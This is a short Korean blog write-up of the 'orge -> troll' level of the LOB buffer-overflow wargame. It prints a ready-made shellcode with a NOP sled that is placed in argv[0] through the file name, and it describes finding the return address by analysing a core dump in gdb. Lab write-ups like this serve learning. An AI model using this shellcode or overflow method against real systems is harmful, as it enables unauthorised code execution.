LOB - 8. orge -> troll
2018. 7. 5. 18:18ㆍWarGame/LOB
어떤 새로운 함정이 새로 생겼는지 확인해보자.
//onemore 부분에서 새로운게 생겼다.
argv[1]도 초기화시키는 명령같다. 그러면 우리가 쉘코드를 입력할 수 있는 자리는 argv[0] 밖에 없다고 할 수 있다.
이름이 argv[0] 부분이니 이름을 쉘코드를 넣는 것으로 바꾸어주자.
쉘코드는 "\x2f"가 없어야해서 구글링해서 퍼왔다.
파일명 : `python -c 'print "\x90"*200 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
그리고 리턴값을 줘야하는데 조건을 만족해주기위해 "\xbf"로만 넣어준다. 당연히 한번에 bash를 얻을 수 는 없을 것이다.
코어가 덤프되었으니 코어를 분석하다
gdb -c core
처음엔 "\x70\xf8\xff\xbf"가 리턴주소같아서 저기로 해보았지만 실패했다.
그래서 더 내려가보니
"\x5f\xf9\xff\xbf"이 부분이 리턴주소라는 생각이 들었고 바로 입력해보았다.
어랏...풀리네 ㅎㅎ
(grin)
'WarGame > LOB' 카테고리의 다른 글
LOB - 2. gremlin -> cobolt (RTL기법) (255) | 2018.07.14 |
---|---|
LOB - 9. troll -> vampire (933) | 2018.07.05 |
LOB - 7.darkelf -> orge (931) | 2018.07.05 |
LOB - 6.wolfman -> darkelf (1062) | 2018.07.05 |
LOB - 5.orc -> wolfman (1069) | 2018.07.05 |